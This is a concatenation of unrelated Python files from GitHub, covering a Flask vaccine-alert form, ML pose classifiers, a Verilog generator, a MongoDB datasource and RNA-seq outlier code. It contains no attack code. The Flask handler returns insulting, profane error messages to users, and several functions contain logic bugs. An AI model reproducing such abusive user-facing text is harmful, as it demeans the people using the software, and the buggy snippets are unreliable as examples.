'__main__':\n runServer()\n \n","repo_name":"player31-kks/socket_gui","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"17933074160","text":"from flask import Flask, render_template, request\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom datetime import datetime, timedelta\n\nfrom util import is_empty\nfrom insert_to_table import insert_user_data_to_db\nfrom check_availability_periodically import check_availability_for_db\n\napp = Flask(__name__)\n\"\"\"\nFlask app instance.\n\"\"\"\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n # On submit, check if the mandatory fields exists or not\n form_data = request.form\n should_error = False\n if is_empty(form_data, \"email\"):\n # User hasn't provided Email ID\n # I hate the user, let me show my hatred real quick\n should_error = True\n error_msg = \"No EMAIL ID was provided, cannot schedule alert\"\n if is_empty(form_data, \"age\"):\n # User hasn't provided age\n # Are you kidding me!!!\n should_error = True\n error_msg = \"No age was provided, cannot schedule alert\"\n if is_empty(form_data, \"pincode\"):\n # User hasn't provided pincode\n should_error = True\n error_msg = \"No pincode was provided, cannot schedule alert\"\n if should_error:\n return error_msg, 400\n\n email = form_data.get(\"email\")\n age = int(form_data.get(\"age\"))\n pincode = form_data.get(\"pincode\")\n username = form_data.get(\"username\")\n if not username:\n username = \"user\"\n\n start_date = form_data.get(\"start_date\")\n if not start_date:\n start_date = datetime.today().strftime('%Y-%m-%d')\n\n end_date = form_data.get(\"end_date\")\n\n if not end_date:\n end_date = (datetime.today() + timedelta(days=365)).strftime('%Y-%m-%d')\n\n cvc_type = form_data.get(\"cvc_type\", \"any\")\n if cvc_type not in (\"any\", \"Free\", \"Paid\"):\n should_error = True\n error_msg = \"Hey, please don't play around with the inputs you lil piece of shit\"\n\n vaccine_choice = form_data.get(\"vaccine_choice\", \"any\")\n if vaccine_choice not in (\"any\", \"COVISHIELD\", \"COVAXIN\"):\n should_error = True\n error_msg = \"Hey, please don't play around with the inputs you lil piece of shit\"\n\n pincode_set = set(pincode.split(\";\"))\n if should_error:\n return error_msg, 400\n\n insert_user_data_to_db(email, age, pincode_set, start_date=start_date, end_date=end_date,\n fee_type=cvc_type, vaccine=vaccine_choice)\n\n return render_template(\"alert_success.html\", username=username)\n\n\n\"\"\"\n# Stop running the Scheduled now.\n\nsched = BackgroundScheduler()\nsched.add_job(check_availability_for_db,'cron', minute='*/30')\nsched.start()\n\"\"\"\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001)\n","repo_name":"return007/bookmycovidshot","sub_path":"bookmycovidshot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"33472948763","text":"import numpy as np\nfib_list = [1, 2]\nvar_1 = 1\nvar_2 = 2\nsum=0\nwhile True:\n temp = var_1 + var_2\n if temp >= 4000000:\n break\n fib_list.append(temp)\n var_1 = var_2\n var_2 = temp\nfor num in fib_list:\n if num%2 == 0:\n print(num, end=\" \")\n sum = sum + num\nprint()\nprint(sum)","repo_name":"Goku-kun/project-euler","sub_path":"problem_2.py","file_name":"problem_2.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35790518261","text":"# Converts a model architecture description along with its weights into verilog. \n\nfrom collections import OrderedDict\nimport numpy as np\nimport pickle\nimport re\nimport os\nfrom verilog_converters import getverilog_conv, getverilog_fc, getverilog_maxp, getverilog_pad, finalize\n\ndef cleanup_arch(arch):\n '''Extract relevant components from architecture description'''\n pad_count = 0\n arch = [x for x in arch.split(\"\\n\") if ('Ternary' in x or 'MaxPool' in x)]\n res_arch = []\n for op in arch:\n op_name = re.findall('\\(([a-z0-9]+)\\): ', op)[0]\n op_type = re.findall(': ([A-Za-z0-9]+)\\(', op)[0]\n \n kernel_size = \"\"\n if 'conv' in op_name:\n kernel_size = re.findall('kernel_size=\\(([0-9]+), [0-9]+\\)', op)[0]\n if 'mp' in op_name:\n kernel_size = re.findall('kernel_size=([0-9]+)', op)[0]\n \n if op_type.startswith(\"MaxPool\") and not op_name.startswith(\"mp\"):\n continue\n if 'padding' in op and 'TernaryConv' in op_type:\n res_arch.append((\"pad\" + str(pad_count) + \"_\" + str(int(kernel_size)//2), \"Padding\"))\n pad_count += 1\n if op_name.startswith('mp'):\n res_arch.append((op_name + \"_\" + kernel_size, op_type))\n continue\n\n res_arch.append((op_name, op_type))\n return res_arch\n\n\ndirname = os.path.dirname(__file__)\nweights_file = open(os.path.join(dirname, \"TNN_mini/weights.dat\"), 'rb')\nweights_dict = pickle.load(weights_file)\nweights_file.close()\n\ndirname = os.path.dirname(__file__)\narchitecture = cleanup_arch(open(os.path.join(dirname, \"TNN_mini/model_architecture.dat\")).read())\n\nprint(weights_dict.keys())\nfor op in weights_dict.keys():\n print(weights_dict[op].shape, end=\" \")\n if 'conv' in op:\n print(\"Convolution\")\n elif 'fc' in op:\n print(\"FC\")\nprint()\nprint(architecture)\n\n\ninput_size_lh = 28 # INPUT SIZE LENGTH/WIDTH\ninput_size_d = 1 # INPUT SIZE DEPTH\ncur_input_name = \"g_input\"\ninitializers_all = \"\"\ncounter = 0\ninclude = []\nverilog_code_all =\"\" \ni_lh_orig = input_size_lh\ni_d_orig = input_size_d\n\nfor name, op_type in architecture:\n print(name, op_type)\n if name.startswith(\"conv\"):\n input_size_lh, input_size_d, verilog_code, initializers, cur_input_name, counter = getverilog_conv(name, cur_input_name, weights_dict[name], input_size_lh, input_size_d, counter)\n elif name.startswith(\"fc\"):\n input_size_lh, input_size_d, verilog_code, initializers, cur_input_name, counter = getverilog_fc(name, cur_input_name, weights_dict[name], input_size_lh, input_size_d, counter)\n elif name.startswith(\"mp\"):\n input_size_lh, input_size_d, verilog_code, initializers, cur_input_name, counter = getverilog_maxp(name, cur_input_name, input_size_lh, input_size_d, counter)\n elif name.startswith(\"pad\"):\n input_size_lh, input_size_d, verilog_code, initializers, cur_input_name, counter = getverilog_pad(name, cur_input_name, input_size_lh, input_size_d, counter)\n \n initializers_all += initializers\n verilog_code_all += verilog_code\n\ninclude = finalize()\n\ncaller_file_code = \"\"\"\n{includes}\n\nmodule mlnn\n#(\n parameter INPUTSIZE = {inputsize}\n)\n(\n clk,\n rst,\n g_input,\n e_input,\n o\n); \n\ninput clk;\ninput rst;\ninput bit [INPUTSIZE-1:0] g_input;\ninput bit [{weightssize}:0] e_input;\noutput bit [{output_size}:0] o;\n\n{misclogic}\n\n{modulecallslist}\n\nassign o = {last_output_name}; \n\nendmodule\n \"\"\".format(includes=\"\".join(['`include \"' + x + '\"\\n' for x in include]), inputsize=str(i_lh_orig*i_lh_orig*i_d_orig), weightssize=str(counter-1), output_size=str(input_size_lh*input_size_lh*input_size_d-1), misclogic=initializers_all, modulecallslist=verilog_code_all, last_output_name=cur_input_name)\n\ndirname = os.path.dirname(__file__)\nf = open(os.path.join(dirname, \"multlayer1.sv\"), \"w+\")\nf.write(caller_file_code)\nf.close()","repo_name":"privacytrustlab/soteria_private_nn_inference","sub_path":"Soteria/Verilog_constructor/convert_verilog.py","file_name":"convert_verilog.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"34730494083","text":"import os\nfrom moviepy.editor import *\n\ntitle = (ImageClip(\"TeX/static_dark_frames_000.png\")\n .set_duration(4)\n .fadeout(1))\n\nintro = [ImageClip(\"TeX/\" + fname).set_duration(8)\n for fname in sorted(os.listdir(\"TeX\"))\n if fname.startswith(\"intro\") and fname.endswith(\".png\")]\nintro[0] = intro[0].fadein(1)\nintro[-1] = intro[-1].fadeout(1)\n\nembedding = [ImageClip(\"TeX/\" + fname).set_duration(8)\n for fname in sorted(os.listdir(\"TeX\"))\n if fname.startswith(\"embedding\") and fname.endswith(\".png\")]\nembedding[0] = embedding[0].fadein(1)\nembedding[-1] = embedding[-1].fadeout(1)\n\nmotion = [ImageClip(\"TeX/\" + fname).set_duration(8)\n for fname in sorted(os.listdir(\"TeX\"))\n if fname.startswith(\"motion\") and fname.endswith(\".png\")]\nmotion[0] = motion[0].fadein(1)\nmotion[-1] = motion[-1].fadeout(1)\n\ntrajectory_movie = VideoFileClip(\"povray/trajectory.avi\")\nembedding_movie = VideoFileClip(\"povray/embedding.avi\")\nmotion_movie = VideoFileClip(\"povray/embedded_motion.avi\")\n\ntrajectory_length = trajectory_movie.duration\nembedding_length = embedding_movie.duration\nmotion_length = motion_movie.duration\n\ntrajectory_insert_1 = (ImageClip(\"TeX/insert_trajectory_1.png\", transparent=True)\n .set_duration(trajectory_length/3)\n .set_position((0.15,0.15), relative=True)\n .crossfadein(.5)\n .crossfadeout(.5))\ntrajectory_insert_2 = (ImageClip(\"TeX/insert_trajectory_2.png\", transparent=True)\n .set_duration(trajectory_length/3)\n .set_start(trajectory_length/3)\n .set_position((0.15,0.15), relative=True)\n .crossfadein(.5)\n .crossfadeout(.5))\ntrajectory_insert_3 = (ImageClip(\"TeX/insert_trajectory_3.png\", transparent=True)\n .set_duration(trajectory_length/3)\n .set_start(2*trajectory_length/3)\n .set_position((0.15,0.15), relative=True)\n .crossfadein(.5)\n .crossfadeout(.5))\n\ntrajectory_comp = CompositeVideoClip([trajectory_movie, trajectory_insert_1,\n trajectory_insert_2, trajectory_insert_3])\n\nembedding_insert_1 = (ImageClip(\"TeX/insert_embedding_1.png\", transparent=True)\n .set_duration(embedding_length/6)\n .set_position((0.15,0.15), relative=True)\n .crossfadeout(.5))\nembedding_insert_2 = (ImageClip(\"TeX/insert_embedding_2.png\", transparent=True)\n .set_duration(2*embedding_length/3)\n .set_start(embedding_length/6)\n .set_position((0.15,0.15), relative=True)\n .crossfadein(.5)\n .crossfadeout(.5))\nembedding_insert_3 = (ImageClip(\"TeX/insert_embedding_3.png\", transparent=True)\n .set_duration(embedding_length/6)\n .set_start(5*embedding_length/6)\n .set_position((0.15,0.15), relative=True)\n .crossfadein(.5))\n\nembedding_comp = (CompositeVideoClip([embedding_movie, embedding_insert_1,\n embedding_insert_2, embedding_insert_3])\n )\n\nembedding_first = embedding_comp.to_ImageClip(duration=3)\nembedding_last = embedding_comp.to_ImageClip(t=embedding_length-.1, duration=3)\n\ncomp = concatenate([title] + intro +\n [trajectory_comp] + embedding +\n [embedding_first, embedding_comp, embedding_last] +\n motion + [motion_movie])\n\ncomp.write_videofile(\"embedding.mp4\")\n","repo_name":"lahvak/Calc3","sub_path":"embedding/makemovie.py","file_name":"makemovie.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25671816799","text":"import cv2\nimport os\nimport csv\nimport pandas as pd\nimport sklearn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sys import platform\nfrom numpy.lib.arraypad import pad\nfrom enum import Enum\n\nfrom deep_sort.iou_matching import iou_cost\nfrom deep_sort.kalman_filter import KalmanFilter\nfrom deep_sort.detection import Detection\nfrom deep_sort.tracker import Tracker as DeepTracker\nfrom deep_sort import nn_matching\nfrom deep_sort import preprocessing\nfrom deep_sort.linear_assignment import min_cost_matching\nfrom deep_sort.detection import Detection as ddet\nfrom tools import generate_detections as gdet\nfrom tools.utils import poses2boxes\n\n\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, LSTM, Embedding, Dropout, BatchNormalization\nfrom keras.utils import to_categorical\nfrom keras.optimizers import SGD\n\nimport autokeras as ak\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\nfrom sklearn.metrics import confusion_matrix,plot_confusion_matrix\nfrom sklearn import preprocessing\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\n\nfrom src.utiles import plot_confusion_matrix2, split_datos, split_xy\n\n\n\n# Funcion para extraer los keypoints de las diferentes imagenes y almacenarlas en un csv con su respectiva clase\ndef extraer_keypointsTrex(pathImagenes,opWrapper,op,dim,csv_path_x,csv_path_y):\n try:\n print(\"##-------- Extraer Keypoints -------------##\")\n\n classes = os.listdir(pathImagenes)\n print(\"--------- Clases modelo ---------------\")\n print(classes)\n\n # Deep Tracker\n metric = nn_matching.NearestNeighborDistanceMetric(\"cosine\",1,None)\n model_filename = 'model_data/mars-small128.pb'\n encoder = gdet.create_box_encoder(model_filename,batch_size=1)\n\n key_pointscsv = ['clase','nose_x','nose_y','neck_x','neck_y','Rshoulder_x','Rshoulder_y','Relbow_x','Relbow_y',\t'Rwrist_x','RWrist_y','LShoulder_x','LShoulder_y','LElbow_x','LElbow_y',\n 'LWrist_x','LWrist_y','RHip_x','RHip_y','RKnee_x','RKnee_y','RAnkle_x','RAnkle_y','LHip_x','LHip_y','LKnee_x','LKnee_y','LAnkle_x','LAnkle_y','REye_x','REye_y',\n 'LEye_x','LEye_y','REar_x','REar_y','LEar_x','LEar_y','LBigToe_x','LBigToe_y','LSmallToe_x','LSmallToe_y','Lheel_x','Lheel_y','RBigToe_x','RBigToe_y',\n 'RSmallToe_x','RSmallToe_y','Rheel_x','Rheel_y','Background_X','Background_y'] \n\n with open(csv_path_x, mode='w', newline=\"\") as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"',quoting=csv.QUOTE_MINIMAL)\n\n # data_writer.writerow(key_pointscsv)\n \n for clase in classes:\n path = pathImagenes+\"/\"+clase\n if os.path.exists(path):\n imagenes = os.listdir(path)\n for img in imagenes:\n tracker = DeepTracker(metric,max_age=30,n_init=3) #100-20\n datum = op.Datum()\n imageToProcess = cv2.imread(path+\"/\"+img)\n imageToProcess = cv2.resize(imageToProcess, dim, interpolation = cv2.INTER_AREA) # resize image\n datum.cvInputData = imageToProcess\n opWrapper.emplaceAndPop(op.VectorDatum([datum]))\n\n frameOut = datum.cvOutputData\n\n if datum.poseKeypoints is not None:\n\n for people in datum.poseKeypoints:\n lstKeypoints = []\n lstKeypoints.append(clase)\n for keypoints in people:\n lstKeypoints.append(keypoints[0]) #x\n lstKeypoints.append(keypoints[1]) #y\n\n data_writer.writerow(lstKeypoints)\n\n del datum\n except Exception as e:\n print(\"Keypoints ->\"+str(e))\n\n\n# Funcion para crear un modelo lstm en base a los keypoints extraidos de los frames y almacenados en el csv\ndef lstm_trex(csv_path,label_names,steps):\n try:\n print(\"##-------- Modelo LSTM -------------##\")\n\n # Lectura y procesamiento de los datos\n split_xy(csv_path)\n\n X_train,y_train = split_datos('output/data/x_train.csv','output/data/y_train.csv',steps)\n print(X_train.shape)\n print(y_train.shape)\n\n X_test,y_test = split_datos('output/data/x_test.csv','output/data/y_test.csv',steps)\n print(X_test.shape)\n print(y_test.shape)\n\n # Datos configuracion LSTM\n n_input = len(X_train[0][0])\n n_hidden = 50 # Hidden layer num of features\n n_classes = len(label_names) #number of action classes\n batch_size = 32\n epochs = 2\n\n # y_train_one_hot = to_categorical(y_train, num_classes=n_classes)\n # y_test_one_hot = to_categorical(y_test, n_classes)\n\n train_size = X_train.shape[0] - X_train.shape[0] % batch_size\n test_size = X_test.shape[0] - X_test.shape[0] % batch_size\n \n model = Sequential([\n # relu activation\n Dense(n_hidden, activation='relu'),\n BatchNormalization(), \n LSTM(n_hidden, return_sequences=True, unit_forget_bias=1.0,dropout=0.2),\n LSTM(n_hidden, unit_forget_bias=1.0),\n BatchNormalization(), \n Dense(n_classes,activation='softmax')\n ])\n\n model.compile(loss='categorical_crossentropy', optimizer=SGD(), metrics=['accuracy'])\n\n history = model.fit(\n X_train[:train_size,:,:], \n y_train[:train_size,:], \n epochs=1,\n batch_size=batch_size\n )\n\n # Configuracion modelo LSTM\n model = Sequential()\n model.add(Embedding(5000, 50, input_length=X_train.shape[1]))\n model.add(Dropout(0.3))\n model.add(LSTM(50, return_sequences=True, dropout=0.3, recurrent_dropout=0.2))\n model.add(LSTM(50, dropout=0.3, recurrent_dropout=0.2))\n model.add(Dense(7, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n model.summary() \n\n model.fit(X_train, y_train, epochs=epochs, batch_size=batch_size, verbose=1)\n\n # Guardar modelo\n # model.save('output/model/sentiment_analysis-trexNorm.h5')\n\n # Test modelo\n # predictions = model.predict(X_test)\n # print(predictions.shape)\n # print(predictions)\n # # Matriz de confusion \n # cm = confusion_matrix(np.argmax(y_train,axis=1), np.argmax(predictions,axis=1))\n # plot_confusion_matrix2(cm, classes=np.asarray(label_names), normalize=True,\n # title='Normalized confusion matrix LSTM') \n # plt.show()\n\n except Exception as e:\n print(\"LSTM Model->\"+str(e))\n\ndef lstmanalisys_trex(csv_path,label_names):\n try:\n print(\"##-------- Modelo LSTM -------------##\")\n \n # Lectura y procesamiento de los datos\n data = pd.read_csv(csv_path)\n data = data.sample(frac=1).reset_index(drop=True)\n cols = data.columns.drop('clase')\n data[cols] = data[cols].apply(pd.to_numeric, errors='coerce')\n print(data.shape)\n print(data.head())\n y_classes = data['clase']\n\n dataKeypoints = data.iloc[0:,1:]\n print(dataKeypoints.head())\n print(dataKeypoints.info())\n\n X = dataKeypoints.to_numpy()\n print(\"--- Dimension y muestra X ---\")\n print(X.shape)\n print(X[:5])\n \n y = pd.get_dummies(data['clase']).values\n print(\"--- Dimension y muestra Y ---\")\n print(y.shape)\n print(y[:9])\n\n # Mapping de las clases\n encoder = LabelEncoder()\n encoder_Y = encoder.fit_transform(y_classes)\n class_mapping = dict(zip(encoder.classes_, encoder.transform(encoder.classes_)))\n print(class_mapping)\n\n # Configuracion modelo LSTM\n model = Sequential()\n model.add(Embedding(5000, 256, input_length=X.shape[1]))\n model.add(Dropout(0.3))\n model.add(LSTM(256, return_sequences=True, dropout=0.3, recurrent_dropout=0.2))\n model.add(LSTM(256, dropout=0.3, recurrent_dropout=0.2))\n model.add(Dense(8, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n model.summary()\n\n # Division de datos\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n\n batch_size = 32\n epochs = 8\n\n model.fit(X_train, y_train, epochs=epochs, batch_size=batch_size, verbose=1)\n\n model.save('output/model/sentiment_analysis-trex.h5')\n\n # Testing model\n predictions = model.predict(X_test)\n\n # Matriz de confusion\n cm = confusion_matrix(np.argmax(y_test,axis=1), np.argmax(predictions,axis=1))\n plot_confusion_matrix2(cm, classes=np.asarray(label_names), normalize=True,\n title='Normalized confusion matrix') \n plt.show()\n except Exception as e:\n print(\"LSTM ->\"+str(e))\n# Funcion para realizar el entrenamiento de un modelo KNN\ndef knn_trex(csv_path,label_names):\n try:\n print(\"##-------- Modelo KNN -------------##\")\n\n # Lectura y procesamiento de los datos\n data = pd.read_csv(csv_path,header=None)\n data = data.sample(frac=1).reset_index(drop=True)\n cols = data.columns.drop(0)\n data[cols] = data[cols].apply(pd.to_numeric, errors='coerce')\n data = data.dropna()\n print(\"--- Dimension y muestra datos ---\")\n print(data.shape)\n print(data.head())\n\n dataKeypoints = data.iloc[0:,1:]\n\n X = dataKeypoints.to_numpy()\n print(\"--- Dimension y muestra X ---\")\n print(X.shape)\n print(X[:5])\n\n # Normalizar datos MinMax\n norm = MinMaxScaler().fit(X)\n X_norm = norm.transform(X)\n print(\"--- Dimension y muestra X normalizada ---\")\n print(X_norm.shape)\n print(X_norm[:2])\n\n # y = pd.get_dummies(data[0]).values\n y = data[0].values\n # [print(data[0][i], y[i]) for i in range(0,5)]\n print(\"--- Dimension y muestra Y ---\")\n print(y.shape)\n print(y[:5])\n\n # Division de los datos\n X_train, X_test, y_train, y_test = train_test_split(X_norm, y, test_size=0.2, random_state=0)\n \n # Modelo KNN con el numero de clases\n model = KNeighborsClassifier(n_neighbors=7)\n model.fit(X_train, y_train)\n\n y_pred = model.predict(X_test)\n print(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\n\n # Matriz de confusion\n plot_confusion_matrix(model, X_test, y_test, normalize='true') \n plt.title(\"Matriz Confusion - k=7\")\n plt.show()\n \n # Prueba de KNN con un rango de K\n k_range = range(1,26)\n scores = {}\n scores_list = []\n for k in k_range:\n knn = KNeighborsClassifier(n_neighbors=k)\n knn.fit(X_train, y_train)\n y_pred = knn.predict(X_test)\n scores[k]=metrics.accuracy_score(y_test, y_pred)\n scores_list.append(metrics.accuracy_score(y_test, y_pred))\n\n plt.plot(k_range,scores_list)\n plt.xlabel(\"Valor de K\")\n plt.ylabel(\"Accuracy\")\n\n plt.show()\n except Exception as e:\n print(\"KNN Model->\"+str(e))\n\n# Funcion para realizar un modelo mediante el algoritmo de automl de AutoKeras\ndef automl_trex(csv_path,label_names):\n try:\n print(\"##-------- Modelo AutoML -------------##\")\n\n # Lectura y procesamiento de los datos\n df = pd.read_csv(csv_path, header=0)\n dataset = df.values\n\n X = dataset[:, 1:51].astype(float)\n Y = dataset[:, 0]\n print(\"--- Dimension X-Y ---\")\n print(X.shape)\n print(Y.shape)\n\n # Normalizar datos MinMax\n norm = MinMaxScaler().fit(X)\n X_norm = norm.transform(X)\n print(\"--- Dimension y muestra X normalizada MinMax ---\")\n print(X_norm.shape)\n print(X_norm[:5])\n\n # Mapping de las clases\n encoder = LabelEncoder()\n encoder_Y = encoder.fit_transform(Y)\n class_mapping = dict(zip(encoder.classes_, encoder.transform(encoder.classes_)))\n print(\"--- Mapeo clases ---\")\n print(class_mapping)\n\n # Division de los datos\n X_train, X_test, Y_train, Y_test = train_test_split(X_norm, encoder_Y, test_size=0.2, random_state=0)\n\n # Configuracion modelo AutoKeras\n clf3 = ak.StructuredDataClassifier(max_trials=1)\n clf3.fit(x=X_train, y=Y_train, epochs=50)\n\n # Test modelo\n y_pred_autok3 = clf3.predict(X_test)\n accuracy_autok3_df = metrics.accuracy_score(Y_test, y_pred_autok3)\n\n # Evaluar modelo\n print(\"Accuracy Evaluate: {accuracy}\".format(accuracy=clf3.evaluate(X_test, Y_test)))\n\n # Matriz de confusion \n cm = confusion_matrix(np.argmax(Y_train,axis=1), np.argmax(y_pred_autok3,axis=1))\n plot_confusion_matrix2(cm, classes=np.asarray(label_names), normalize=True,\n title='Normalized confusion matrix AUTOML') \n plt.show()\n\n # Obtener mejor modelo \n best_model = clf3.tuner.get_best_model()\n\n # Guardar modelo\n try:\n best_model.save(\"output/model/automl_sentiment-trex.h5\")\n except Exception as e:\n print(\"Save AutoML->\"+str(e))\n\n del clf3\n except Exception as e:\n print(\"AutoML Model->\"+str(e))","repo_name":"japicazosuni/TFG_HAR","sub_path":"secuencia-videos/src/trex.py","file_name":"trex.py","file_ext":"py","file_size_in_byte":13730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69969710840","text":"import carla\nfrom carla_birdeye_view import BirdViewProducer, BirdViewCropType, PixelDimensions\n\nclass BirdEyeView:\n\n def __init__(self):\n client = carla.Client('localhost', 2000)\n client.set_timeout(10.0)\n self.birdview_producer = BirdViewProducer(\n client, # carla.Client\n target_size=PixelDimensions(width=100, height=300),\n pixels_per_meter=10,\n render_lanes_on_junctions=True,\n crop_type=BirdViewCropType.FRONT_AREA_ONLY\n )\n\n def getImage(self, vehicle):\n try:\n birdview = self.birdview_producer.produce(\n agent_vehicle=vehicle # carla.Actor (spawned vehicle)\n )\n except Exception as ex:\n print(ex)\n # Mask to RGB image\n image = BirdViewProducer.as_rgb(birdview)\n return image\n","repo_name":"JdeRobot/BehaviorMetrics","sub_path":"behavior_metrics/robot/interfaces/birdeyeview.py","file_name":"birdeyeview.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"40"} +{"seq_id":"33542700304","text":"from subprocess import run, PIPE\nimport sys\nimport time\n\n# usage: python3 run.py sorting_and_searching/distinct_numbers test_input.txt\n\nprogram = sys.argv[1]\ninput = sys.argv[2]\n\nwith open(input, \"r\") as fp:\n input_str = fp.read()\n\nt = time.time()\np = run([program], stdout=PIPE, input=input_str, encoding='ascii')\nelapsed = time.time()-t\nprint(p.returncode)\nprint(p.stdout)\n\nprint(f\"Time: {elapsed:.6f}\")","repo_name":"alenic/comprosol","sub_path":"CSES/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33943098798","text":"import sys\nfrom pymongo.results import InsertOneResult, DeleteResult, UpdateResult\nfrom dataclasses import asdict\n\nsys.path.append(\".\")\nfrom databases.mongodb import MongoDatabase\nfrom lib.core.data.pet_profile.models.pet_profile import PetProfileModel\n\n\nclass PetProfileLocalDatasource:\n \n def __init__(self):\n self.db = MongoDatabase()\n\n\n def get_pet_profile(self, userId: int) -> (PetProfileModel | None):\n query_pet: dict = {\"userId\": userId}\n pet_exists = self.db.exists_in_db(query_pet)\n \n if pet_exists:\n pet_profile_dict: dict = self.db.find_table(query_pet)\n pet_profile_dict.pop(\"_id\")\n pet_profile = PetProfileModel(**pet_profile_dict)\n return pet_profile\n \n else: \n return None\n \n \n def delete_pet_profile(self, userId: int) -> (DeleteResult | None):\n query_pet: dict = {\"userId\": userId}\n pet_exists = self.db.exists_in_db(query_pet)\n \n if pet_exists:\n delete_pet_profile = self.db.delete_tables(query_pet)\n return delete_pet_profile\n \n else: \n return None\n \n \n def insert_pet_profile(self, profile: PetProfileModel) -> (InsertOneResult | None):\n query_pet: dict = {\"userId\": profile.userId}\n pet_exists = self.db.exists_in_db(query_pet)\n \n \n if pet_exists:\n return None\n \n else: \n dict_profile = asdict(profile)\n print(dict_profile)\n upload = self.db.upload_table(dict_profile)\n \n return upload\n \n \n def update_pet_profile(self, profile: PetProfileModel) -> (UpdateResult | None):\n query_pet: dict = {\"userId\": profile.userId}\n pet_exists = self.db.exists_in_db(query_pet)\n \n \n if pet_exists:\n return None\n \n else: \n query = {\"userId\": profile.userId}\n dict_profile = asdict(profile)\n upload = self.db.update_table(query, dict_profile)\n return upload","repo_name":"JustZet/Grow-a-pet","sub_path":"lib/core/data/pet_profile/datasources/local_profiles.py","file_name":"local_profiles.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17713807027","text":"import os\nimport re\nfrom functools import partial\n\nimport pandas as pd\nimport matplotlib\n\nfrom .genes import RNASeqError\nfrom .plotting import plot_outs_per_id\nfrom .utils import applyParallel\n\nmatplotlib.use('Agg')\n\nimport statsmodels.api as sm\n\n\n\"\"\"statsmodels/compat/pandas.py:56:\nFutureWarning: The pandas.core.datetools module is deprecated and will be\nremoved in a future version. Please use the pandas.tseries module instead.\n\"\"\"\n\n\nclass Outliers(object):\n \"\"\"Methods and attributes of outliers.\"\"\"\n\n def __init__(self, pheno_loc, output_prefix, outlier_postfix,\n extrema, distribution, threshold, cov, exclude_ids,\n n_processes, logger):\n \"\"\"Initialize outlier dataframe.\n\n Args:\n pheno_loc (:obj:`str`): gene expression (phenotype) location\n output_prefix (:obj:`str`): file prefix for outputs\n outlier_postfix (:obj:`str`): file ending for outlier files\n extrema (:obj:`boolean`): T/F for using most extreme outlier\n distribution (:obj:`str`): type of outlier distribution considered\n threshold (:obj:`list`): list of outlier cut-off thresholds\n n_processes (:obj:`int`): number of workers/cores to run at a time\n logger (:obj:`logging object`): Current logger\n\n Attributes:\n expr_long_df (:obj:`DataFrame`): RNAseq expression in long format\n expr_outs_loc (:obj:`str`): full outlier file location\n extrema (:obj:`boolean`): T/F for using most extreme outlier\n distribution (:obj:`str`): type of outlier distribution considered\n threshold (:obj:`list`): list of outlier cut-off thresholds\n least_extr_threshold (:obj:`float`): least extreme threshold\n\n Raises:\n :obj:`RNASeqError`: if `distribution` is not valid, i.e., not in\n [\"normal\", \"rank\", \"custom\"]\n\n TODO:\n low_memory is deprecated so instead specify any ambiguous dtypes\n https://stackoverflow.com/questions/24251219/pandas-read-csv-low-memory-and-dtype-options\n\n \"\"\"\n gene_expr_df = pd.read_table(pheno_loc, low_memory=False)\n gene_expr_df = gene_expr_df.iloc[:, 3:]\n # logger.debug(gene_expr_df.head())\n self.n_processes = n_processes\n gene_expr_df.rename(columns={gene_expr_df.columns[0]: \"gene\"},\n inplace=True)\n if exclude_ids:\n logger.debug(\"Expr DF size before excluding IDs:\")\n logger.debug(gene_expr_df.shape)\n exclude_ids_in_df = [\n i for i in exclude_ids if i in gene_expr_df.columns]\n if exclude_ids_in_df:\n gene_expr_df.drop(exclude_ids_in_df, axis=1, inplace=True)\n logger.debug(\"Expr DF size AFTER excluding IDs:\")\n logger.debug(gene_expr_df.shape)\n # if calculating covariates, re-normalize\n self.cov = cov\n \"\"\"Re-calculating the z-score (not sure if appropriate)\n # if self.cov:\n gene_expr_df = self.recalculate_Zscore(gene_expr_df)\n # \"\"\"\n # Convert gene expression data frame from wide to long:\n self.expr_long_df = pd.melt(\n gene_expr_df,\n id_vars='gene', # gene_expr_df.columns.values[0], # 'gene',\n value_vars=gene_expr_df.columns[1:].tolist(),\n var_name='blinded_id',\n value_name='z_expr')\n # logger.debug(self.expr_long_df.head())\n # logger.debug(self.expr_long_df.shape)\n # set the output file location\n self.expr_outs_loc = (output_prefix + \"_outliers.txt\")\n if outlier_postfix:\n self.expr_outs_loc = outlier_postfix\n # self.expr_outs_loc = (output_prefix + \"_\" + outlier_postfix)\n # set states on which specific outlier definitions are being used\n self.extrema = extrema\n self.distribution = distribution\n self.threshold = threshold\n if isinstance(self.threshold, float):\n 